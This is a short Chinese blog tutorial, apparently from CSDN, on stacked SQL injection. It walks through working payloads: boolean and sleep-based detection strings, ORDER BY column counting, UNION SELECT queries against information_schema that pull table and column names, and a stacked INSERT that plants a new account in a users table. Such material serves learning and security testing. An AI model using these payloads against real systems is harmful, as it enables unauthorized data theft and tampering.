【网络安全】SQL注入--堆叠注入

堆叠注入是一种严重的SQL注入形式,允许攻击者同时执行多条数据库语句。文章介绍了如何检测堆叠注入,如使用1and1=1--等方法,以及如何通过联合查询获取表名和字段名称。此外,还提到了利用堆叠注入添加账号密码的危险行为。
摘要由CSDN通过智能技术生成

堆叠注入

堆叠注入就是可以同时执行多条语句,危害较大,利用此漏洞可以进行删库或者修改数据库信息

检测是否需存在sql注入

1' and 1=1 -- 
1' and 1=2 --   #查看页面是否返回一致
1' ;sleep(5)  #检测是否存在堆叠注入

查询存在多少字段

1' order by 5 -- 

在这里插入图片描述

使用联合查询获取表名

-1' union select 1,2,(select group_concat(TABLE_NAME) from
information_schema.TABLES where TABLE_SCHEMA=database() limit 1) -- 

在这里插入图片描述

使用联合查询获取字段名称

-1' union select 1,2,(select group_concat(column_name) from
information_schema.columns where TABLE_NAME='users' limit 1)--+

在这里插入图片描述

使用堆叠注入添加账号密码

1' ;insert into users values(33,'heihei','tiantian') --+

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值